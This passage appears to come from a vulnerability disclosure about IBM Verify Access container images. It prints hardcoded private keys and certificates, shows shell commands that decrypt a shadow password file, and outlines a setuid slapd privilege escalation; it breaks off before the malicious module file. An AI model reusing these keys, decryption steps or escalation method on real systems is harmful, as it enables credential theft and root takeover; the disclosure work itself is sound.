MvRgK5XvrzCKWD9PtWpIb4nRssJhVDAgfPQf5tlQ05QhKagakxENVB6wmcvOiU2l
zYZDTUGFVfgd1OxH7JICaTfBlhncd2OYaHxr+sXrPGuI+Ckz/U5q6UU+/b5EYEPr
7BSlmptg6CCFLlJ/Mz3qzcm2Wd9/KWEEbwr7fRLcAQKBgQDIoEC54Fsdj07SHwaM
iWC72WysdBedH5DUM39cRiorYz/E5rFIKWz8c4Fz4sx0IkTqM2JvS1frtvPgMTTV
PvowBcLrLIIBj3ZktheAijCtB7g0FR8EBJpJvY3nPYYA08akeJ2wIrV/AdXiMGR+
dJXnJRmoVI6tdk/Y9xRfUuahqQKBgQDsp+v5PkMWYyRsja6cjN4K9bExRbPCMyXo
o3VisQXQYnVdKJE86g+PMiwY4KJksZ3ZPYduB4Hn+9qcKWRXkg/VbInE9+TxwBOT
E4cf1bUibtNZEF4JeV7/FE+K76RgxROufXpRlrTqlmzblIBIeA14sGCC/3unb6tV
mfCGe18l7QKBgQCs0g6vj2otrnMRYZR8nyJq7sJEU8S7nqNdh/bf/7j3owkdjjOM
m9K8LKuIrge8yoBe1mCmylo0PGcb6oc+Yn+VuoDLoI1k1rX/zzOzkFaZ1pqAkuki
xuw5NUX1ufOi5sqohxYe0edSPryFmXYX0EoI0NanQB+foNjrZvtvmbP98QKBgAHG
0PKyEPbeD6vw9FqghBo49feUumC+2Y4BjCQNiCmkU5U7dLusVimRCtu09AMlgjXb
TGT7EXKYZW++r84ofo3vnqkn40QdWQhFoUIP7KgxhMyqXspbaucnU+GLIwTG9frd
Xkm2g+0u6+pKFxx0KkW5rT/OgzMil3qxCSk5S+GRAoGAVzyS/rD6YInD7/vWUqwm
ttgKBm1d/uL2fMzx0KCnuKd5gJwfLIx9wDR4862VyWxOof8quqAWAthSGgg99Bjj
dujkG+fMEu+pYaxTmte0HSC4I+QTkQrOup4wtwVFz2t+0yPlmneQXmJ+K5Wu9ClR
uxhPVbNJYbPOs02by37UXn8=
-----END PRIVATE KEY-----
Bag Attributes
friendlyName: encKey
localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDsJ4YkXiuJVyuD
N2Ibykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lM
x1k7AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6
szaEMmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrw
G9Iissr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzM
DrlEPELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3
R5JZZbEtAgMBAAECggEABB9RCrysBAAZuFSREk47s+NE5JGSN3klHESHzinuZphv
9piID0BX0/Ar6uo4aO+GXrj9fqHZi2ikR/12yW0NpjYhcMsr1geMTNkJXPex+wwJ
eQWaoEXeBk3bbGbfMzqrxUh/QgyJqpu48wZ7ROSIqF5DMYVPElkkSAHWmdvgUnQi
T5m+F+eq5dGYx82V/COXKzOKUd714o7uL6bPqnFbZlQLGbDnUruFLLNsktrVhMCH
f2n7vj2irRyehFB9iJWoQYzZRYnt7ZZwaiC5tM1FH08Ba9KWhKioV0euO8t2ojkt
VW3EKTx5qrxnKvchlgDzb9neb/p9PtFUy/AuB/3n6QKBgQDzv99rQUVVLsaTFK8A
UWzXfEB+su0vxK5Q8hpgF9EdOGLZQtTpl8/xIj5Np7OqVclQA7usx6t9mcJwjkdH
blUubDs8MOcvbxfjOos3LdZ4egOfiac7N4nMkjh1XUvUt0bvkNO+GtgDgsS16EiE
X9fsafsbkQYqsNd1qag4u5M9xQKBgQD4Be5dLZ0A62qQlaQA5Vl8bp8woL843qKC
PYGIEf5/sQX3oYRhM2En6RI4nMt6htPn7WB0T7vCCi+XEACnruAUJFEyZARpeGHG
5jx3p4p3l/QUxCgdzXceEJTjabesOOZSuPazjaj1RWoAU7fRTwnG+0msq15zlkqG
UjVnqsoESQKBgBheXl/CrsPNYVzi/HvzqAYDDg+co8nax/KfwbNJrkZVlMxTuiWA
X/GjkscAtR2aZf3x4ZlsfOCZtq66CrZBeZKij2l9Gh/L4398It7pXj+9Mw+IG4f4
DXa+R5a0NRiXGihpOkIPPPlc4X2uM1HIozWngstGvG8YLvI8e+zwE9BhAoGAf649
+YXjz3dh0rDWTwfCu4YPOW9nQZWLP1T+e9gXlhDBq6tghNF4cJ1RngdJ0Pfb2wee
ogHx/IBV44R/cdNa08OmcTR/+PPaEhSwiECdzddR9ebNaBo/+iA7JZ9kyKo6F9fU
WLbShgGIAkcW2A/CTsdKNDO8WfDCyMdFaurHONECgYA0e/5TN/+AGLktUd7VIlOC
5FCHkAGl4iHJn/3v5r8yfh55Otf+K9vIUrEGW9XEouIofLMapbKqxiTD7YCbrbsy
NyoRMUtmBWnh7yrWkl/gvLIRsAw1R248Q1uxLb0JytRyf/8vW0YOK1grDxnijULH
arClGP/McDNH4FD3S9dgJQ==
-----END PRIVATE KEY-----
And the corresponding certificates:
Bag Attributes
friendlyName: ca
localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF
subject=C = us, O = ibm, OU = isam, CN = ca
issuer=C = us, O = ibm, OU = isam, CN = ca
-----BEGIN CERTIFICATE-----
MIIDNDCCAhygAwIBAgIINKDsXZO6zrowDQYJKoZIhvcNAQELBQAwNzELMAkGA1UE
BhMCdXMxDDAKBgNVBAoTA2libTENMAsGA1UECxMEaXNhbTELMAkGA1UEAxMCY2Ew
IBcNMTkwMzIxMDQ1NzAzWhgPMjEwMTA1MTEwNDU3MDNaMDcxCzAJBgNVBAYTAnVz
MQwwCgYDVQQKEwNpYm0xDTALBgNVBAsTBGlzYW0xCzAJBgNVBAMTAmNhMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuXdVJAQqU5iu+NNUakipeNkiJwNA
fM4Gy4GRvhz6J4iIMM27uJUSUhRmho57iR9XHFj78bg7b+Udul+BIZy/UXsCYhw0
6tUUZz/16kI2t7h8LCguMlJcr4QXF/hXKEys6uMu9uGWbNhiDPkOHeDrFwKJkM90
3hFk/bcq+4AoAyfFt1r6RFBOpqb5tDj7oxYrwDPVrOm2O83Ga6o1ODXLf/4KvapW
bijFmp+vLxPsjKiQJAgi4emBvBAPk1P00D+HAngiIlAQQugNUQjGwgPbewIFk5ST
8bj03YExEy0Vw5TCVoVsbkxlrZF660l2liMAU5OF1X3itsZGLETzRZgWdQIDAQAB
o0IwQDAfBgNVHSMEGDAWgBRXaoj3HRsUC6I+wha3FcN9ng+jDDAdBgNVHQ4EFgQU
V2qI9x0bFAuiPsIWtxXDfZ4PowwwDQYJKoZIhvcNAQELBQADggEBAG+bhfLKKtyj
Lrr32TZA1NRNMaSsIy5u8J8EkNf17NExfDnbgCB9omz1MPG2wIwdnzKHoIT+IqyP
Dtg2A21pKeJXDLObBcTgHoFR6zNJw9Ph8k7AygxaqPldVB/PvsCacMRvlGVwFJ8b
dClu6wAfVZv+oQDM+9zNIDVk39alp/T7dtvVqm1nCLH4C3E3r6KQw6pXOFtI5641
bAyK45l9kJSw+B4TF/mpL1+HNYv1baxkiSiwlgts+7SO2fAmrWE19MukWfj2oHLr
gs3PLYVjz8MnZJ9SBwXXGYFaV0qS9T8wLYe9+5aSK6CT5rjo5ZAncKh4bxyYEW75
cGAPLNhMRL8=
-----END CERTIFICATE-----
Bag Attributes
friendlyName: encKey
localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13
subject=C = US, O = IBM, OU = GSKIT, CN = encKey
issuer=C = US, O = IBM, OU = GSKIT, CN = encKey
-----BEGIN CERTIFICATE-----
MIIEJjCCAw6gAwIBAgIIEuizp4Aw/w8wDQYJKoZIhvcNAQEFBQAwPDELMAkGA1UE
BhMCVVMxDDAKBgNVBAoTA0lCTTEOMAwGA1UECxMFR1NLSVQxDzANBgNVBAMTBmVu
Y0tleTAeFw0xOTAzMjEwNDU2NTlaFw0yOTAzMTkwNDU2NTlaMDwxCzAJBgNVBAYT
AlVTMQwwCgYDVQQKEwNJQk0xDjAMBgNVBAsTBUdTS0lUMQ8wDQYDVQQDEwZlbmNL
ZXkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDsJ4YkXiuJVyuDN2Ib
ykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lMx1k7
AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6szaE
MmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrwG9Ii
ssr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzMDrlE
PELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3R5JZ
ZbEtAgMBAAGjggEqMIIBJjCCASIGHCsGAQSD3OuTf4Pc65N/g9zrk3+r7CeDsWQC
pwkEggEARE7WVCtMEiBaqLgkERWOycU2QormaqloW2kdYi0iZT7NV/3tw0DNbcGK
pWdWfqtM4BM2x7Zq1ilGkK3NtGDnvRTBvrCFt0j/fU80/B9yBoELS0OWqKDkLiZi
enYORA427Y4JNYiRWngQCBPboqqp1oOB03dxujVH85W/3AniYol4fZBiUdYMfhWi
0sKxy5El/XDpYsA8w6ZQ0jz3/uQkNzY96A6QdO/4wB9P4YpKrl3XTKYGMtwoSW4b
QbXu2DOWvPZHxkXLizkeEk9/j+DC27nA7/ZIBNRV4pqOg2lo+7Po9XwwNyE2+1o2
4/2lwxPxDvGFYP05F78XHPEal8LgPTANBgkqhkiG9w0BAQUFAAOCAQEAuw8iMAY5
CD5l52ei96Aalm+mdVc+r7BkfYMHR2yjzpF9EZS16fd5dPAiq1DHSWZeZAxjB7dD
8jVS5CzMwB+07S8Yy9OgPD9tB4ittv5SK+oQDJwK9AQhIJXppznpb/GDEV63xdVB
+NBLvKLVxhvgd/SR8hsjJRdCKRk+zk45EuUpMGlq/ke65tjVXjwjxrVASeVkfmnM
Q+AVrvXc2Ywnby4JJYXD+JVEEkJvxdHgQbLwAJAs6jYFHd/zo7ZPQuZt8jO9n64/
GE55CDW8KBWsIw61KCPCCD1qOV03+mAT7xnDepzb8BkMrA3QUbEbriKkt5I7/2Gj
DxxuUpf+LWXLEw==
-----END CERTIFICATE-----
After the analysis of the certificates and the private keys, we were able to extract a CA private key and a private encryption/decryption key:
kali-docker# openssl x509 -in ca.pem -text -noout -modulus
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 3792290772900564666 (0x34a0ec5d93baceba)
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=us, O=ibm, OU=isam, CN=ca
Validity
Not Before: Mar 21 04:57:03 2019 GMT
Not After : May 11 04:57:03 2101 GMT
Subject: C=us, O=ibm, OU=isam, CN=ca
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:b9:77:55:24:04:2a:53:98:ae:f8:d3:54:6a:48:
a9:78:d9:22:27:03:40:7c:ce:06:cb:81:91:be:1c:
fa:27:88:88:30:cd:bb:b8:95:12:52:14:66:86:8e:
7b:89:1f:57:1c:58:fb:f1:b8:3b:6f:e5:1d:ba:5f:
81:21:9c:bf:51:7b:02:62:1c:34:ea:d5:14:67:3f:
f5:ea:42:36:b7:b8:7c:2c:28:2e:32:52:5c:af:84:
17:17:f8:57:28:4c:ac:ea:e3:2e:f6:e1:96:6c:d8:
62:0c:f9:0e:1d:e0:eb:17:02:89:90:cf:74:de:11:
64:fd:b7:2a:fb:80:28:03:27:c5:b7:5a:fa:44:50:
4e:a6:a6:f9:b4:38:fb:a3:16:2b:c0:33:d5:ac:e9:
b6:3b:cd:c6:6b:aa:35:38:35:cb:7f:fe:0a:bd:aa:
56:6e:28:c5:9a:9f:af:2f:13:ec:8c:a8:90:24:08:
22:e1:e9:81:bc:10:0f:93:53:f4:d0:3f:87:02:78:
22:22:50:10:42:e8:0d:51:08:c6:c2:03:db:7b:02:
05:93:94:93:f1:b8:f4:dd:81:31:13:2d:15:c3:94:
c2:56:85:6c:6e:4c:65:ad:91:7a:eb:49:76:96:23:
00:53:93:85:d5:7d:e2:b6:c6:46:2c:44:f3:45:98:
16:75
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C
X509v3 Subject Key Identifier:
57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
6f:9b:85:f2:ca:2a:dc:a3:2e:ba:f7:d9:36:40:d4:d4:4d:31:
a4:ac:23:2e:6e:f0:9f:04:90:d7:f5:ec:d1:31:7c:39:db:80:
20:7d:a2:6c:f5:30:f1:b6:c0:8c:1d:9f:32:87:a0:84:fe:22:
ac:8f:0e:d8:36:03:6d:69:29:e2:57:0c:b3:9b:05:c4:e0:1e:
81:51:eb:33:49:c3:d3:e1:f2:4e:c0:ca:0c:5a:a8:f9:5d:54:
1f:cf:be:c0:9a:70:c4:6f:94:65:70:14:9f:1b:74:29:6e:eb:
00:1f:55:9b:fe:a1:00:cc:fb:dc:cd:20:35:64:df:d6:a5:a7:
f4:fb:76:db:d5:aa:6d:67:08:b1:f8:0b:71:37:af:a2:90:c3:
aa:57:38:5b:48:e7:ae:35:6c:0c:8a:e3:99:7d:90:94:b0:f8:
1e:13:17:f9:a9:2f:5f:87:35:8b:f5:6d:ac:64:89:28:b0:96:
0b:6c:fb:b4:8e:d9:f0:26:ad:61:35:f4:cb:a4:59:f8:f6:a0:
72:eb:82:cd:cf:2d:85:63:cf:c3:27:64:9f:52:07:05:d7:19:
81:5a:57:4a:92:f5:3f:30:2d:87:bd:fb:96:92:2b:a0:93:e6:
b8:e8:e5:90:27:70:a8:78:6f:1c:98:11:6e:f9:70:60:0f:2c:
d8:4c:44:bf
Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675
kali-docker# openssl rsa -in ca.key -modulus -noout
Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675
kali-docker# openssl x509 -in encKey.pem -text -noout -modulus
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1362536419271180047 (0x12e8b3a78030ff0f)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=US, O=IBM, OU=GSKIT, CN=encKey
Validity
Not Before: Mar 21 04:56:59 2019 GMT
Not After : Mar 19 04:56:59 2029 GMT
Subject: C=US, O=IBM, OU=GSKIT, CN=encKey
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:ec:27:86:24:5e:2b:89:57:2b:83:37:62:1b:ca:
47:7c:ea:27:94:7c:8a:a5:44:9e:2d:d1:9e:34:09:
79:1f:71:4a:12:61:f1:9f:11:49:74:bc:66:bf:85:
15:7a:74:18:2b:d1:cb:ec:3f:55:2e:87:c9:4c:c7:
59:3b:00:5d:8b:64:1f:f7:1d:fe:36:32:23:78:6f:
50:52:84:29:14:ff:f5:03:8f:0d:c8:24:36:e5:a4:
3c:40:b3:af:b0:34:72:e3:67:74:e6:bb:88:fc:58:
f1:fa:b3:36:84:32:62:ca:74:03:95:5f:78:f8:a4:
49:5c:a1:3c:2c:a3:34:7e:17:ed:57:05:ca:7d:1b:
e9:e1:23:29:af:4d:ab:24:5b:2f:10:8b:61:07:97:
e3:36:a9:ba:f0:1b:d2:22:b2:ca:f5:c1:7d:ca:9c:
8e:61:c6:f1:c0:b4:47:e5:c0:5b:b5:a8:87:10:15:
d1:28:fe:71:ba:fb:8e:53:ce:1b:88:51:37:a9:d6:
37:2a:0c:a4:c5:b2:ec:cc:0e:b9:44:3c:42:c6:a8:
75:61:91:8a:d4:68:26:14:b6:21:0e:8d:95:dc:13:
a1:ee:7f:2d:74:9c:48:e8:de:70:11:c8:a9:48:a2:
6d:c0:f4:68:bc:aa:c7:2a:f5:78:77:47:92:59:65:
b1:2d
Exponent: 65537 (0x10001)
X509v3 extensions:
1.3.6.1.4.999999999.999999999.999999999.718375.55524.2.5001:
DN.T+L. Z..$.....6B..j.h[i.b-"e>.W...@.m...gV~.L..6..j.)F....`........H.}O4..r...KC.....&bzv.D.6...5..Zx...........wq.5G......b.x}.bQ..~.......%.p.b.<..P.<...$76=...t....O..J.].L..2.(In.A...3...G.E..9..O.........H..U....ih....|07!6.Z6.........`.9.........=
Signature Algorithm: sha1WithRSAEncryption
Signature Value:
bb:0f:22:30:06:39:08:3e:65:e7:67:a2:f7:a0:1a:96:6f:a6:
75:57:3e:af:b0:64:7d:83:07:47:6c:a3:ce:91:7d:11:94:b5:
e9:f7:79:74:f0:22:ab:50:c7:49:66:5e:64:0c:63:07:b7:43:
f2:35:52:e4:2c:cc:c0:1f:b4:ed:2f:18:cb:d3:a0:3c:3f:6d:
07:88:ad:b6:fe:52:2b:ea:10:0c:9c:0a:f4:04:21:20:95:e9:
a7:39:e9:6f:f1:83:11:5e:b7:c5:d5:41:f8:d0:4b:bc:a2:d5:
c6:1b:e0:77:f4:91:f2:1b:23:25:17:42:29:19:3e:ce:4e:39:
12:e5:29:30:69:6a:fe:47:ba:e6:d8:d5:5e:3c:23:c6:b5:40:
49:e5:64:7e:69:cc:43:e0:15:ae:f5:dc:d9:8c:27:6f:2e:09:
25:85:c3:f8:95:44:12:42:6f:c5:d1:e0:41:b2:f0:00:90:2c:
ea:36:05:1d:df:f3:a3:b6:4f:42:e6:6d:f2:33:bd:9f:ae:3f:
18:4e:79:08:35:bc:28:15:ac:23:0e:b5:28:23:c2:08:3d:6a:
39:5d:37:fa:60:13:ef:19:c3:7a:9c:db:f0:19:0c:ac:0d:d0:
51:b1:1b:ae:22:a4:b7:92:3b:ff:61:a3:0f:1c:6e:52:97:fe:
2d:65:cb:13
Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D
kali-docker# openssl rsa -in encKey.key -modulus -noout
Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D
kali-docker#
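The equal Modulus lines above are what ties each extracted private key to its certificate: an RSA certificate and key belong together exactly when their moduli match. A self-contained sketch of that check, on a throwaway pair generated for the demo:

```shell
# Prove a certificate/private-key pairing by comparing RSA moduli,
# as done above for the extracted CA and encKey material.
cd "$(mktemp -d)"
openssl req -x509 -newkey rsa:2048 -nodes -keyout demo.key -out demo.pem \
    -subj '/CN=ca-demo' -days 1 2>/dev/null
m_cert=$(openssl x509 -in demo.pem -noout -modulus)
m_key=$(openssl rsa -in demo.key -noout -modulus)
# Identical moduli -> the key is the private half of the certificate:
[ "$m_cert" = "$m_key" ] && echo MATCH
```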
It is also possible to decrypt the shadow.enc file of a live instance using the hardcoded device_key.kdb:
kali-docker# file shadow.enc
shadow.enc: data
kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/lib64:/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64 /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/sbin/isva_decrypt shadow.enc
kali-docker# cat shadow.enc
root:!!$6$[REDACTED]:19255:0:99999:7:::
bin:*:18367:0:99999:7:::
daemon:*:18367:0:99999:7:::
adm:*:18367:0:99999:7:::
lp:*:18367:0:99999:7:::
sync:*:18367:0:99999:7:::
shutdown:*:18367:0:99999:7:::
halt:*:18367:0:99999:7:::
mail:*:18367:0:99999:7:::
operator:*:18367:0:99999:7:::
games:*:18367:0:99999:7:::
ftp:*:18367:0:99999:7:::
nobody:*:18367:0:99999:7:::
dbus:!!:19115::::::
systemd-coredump:!!:19115::::::
systemd-resolve:!!:19115::::::
tss:!!:19115::::::
postgres:!!:19151::::::
ldap:!!:19151::::::
admin:$6$[REDACTED]:19255:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::
isam:!!:19151:1:90:7:::
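In the shadow format, a second field of "*" or "!!" marks a locked account; only entries carrying a real $6$ (SHA-512) hash are candidates for offline cracking. A sketch of that triage on an abbreviated sample mirroring the decrypted file above:

```shell
# Keep only accounts whose password field is a usable $6$ hash.
# Abbreviated sample shadow file (hashes are placeholders):
cd "$(mktemp -d)"
cat > shadow.demo <<'EOF'
root:!!$6$abc:19255:0:99999:7:::
bin:*:18367:0:99999:7:::
admin:$6$def:19255:0:99999:7:::
dbus:!!:19115::::::
EOF
# root's hash is present but "!!"-prefixed (locked), so only admin matches:
awk -F: '$2 ~ /^\$6\$/ {print $1}' shadow.demo
```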
An attacker can easily decrypt the encrypted files inside the snapshot files. These snapshots contain an openldap.zip file containing the OpenLDAP configuration, keytabs, passwords, SSL certificates and private keys.
The encryption mechanism, based on hardcoded keys, is ineffective and provides a false sense of security.
Details - Local Privilege Escalation using OpenLDAP
It was observed that the official IBM Docker image ibmcom/verify-access contains a Local Privilege Escalation vulnerability.
The slapd binary, used to run OpenLDAP, has incorrect permissions, allowing any user to run it as root. An attacker can run slapd as root and point it at a malicious configuration file to execute code as root.
Static analysis of the extracted file system shows that the usr/sbin/slapd program is owned by root:$group with mode 4755:
kali-docker# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ibmcom/verify-access-runtime 10.0.4.0 498e181d7395 3 months ago 1.07GB
ibmcom/verify-access-wrp 10.0.4.0 c0003aca743c 3 months ago 442MB
ibmcom/verify-access 10.0.4.0 206efdd7809c 3 months ago 1.53GB
ibmcom/verify-access-dsc 10.0.4.0 959f6f1095e9 3 months ago 305MB
kali-docker# ls -la _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd
-rwsr-sr-x 1 root user 1916768 Jun 8 01:30 _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd
While checking on a live system, we can confirm the permissions 4755 (suid bit) are used in the verify-access instance. The owner is root:ivmgr:
[isam@verify-access log]$ ls -la /usr/sbin/slapd
-rwsr-sr-x 1 root ivmgr 1916768 Jun 8 13:30 /usr/sbin/slapd
[isam@verify-access log]$
By default, slapd allows loading external modules (and therefore executing code). The .la files contain information about the shared libraries that slapd will load.
Content of /etc/openldap/slapd.conf:
# Load dynamic backend modules:
# modulepath /usr/lib/openldap
# moduleload back_bdb.la
# moduleload back_ldap.la
# moduleload back_ldbm.la
# moduleload back_passwd.la
# moduleload back_shell.la
moduleload syncprov.la
It is possible to load a malicious module as root using a crafted .la configuration file, allowing a local attacker to escalate privileges to root. For example, we can turn the default file below into a malicious one by pointing the libdir option to an attacker-controlled directory:
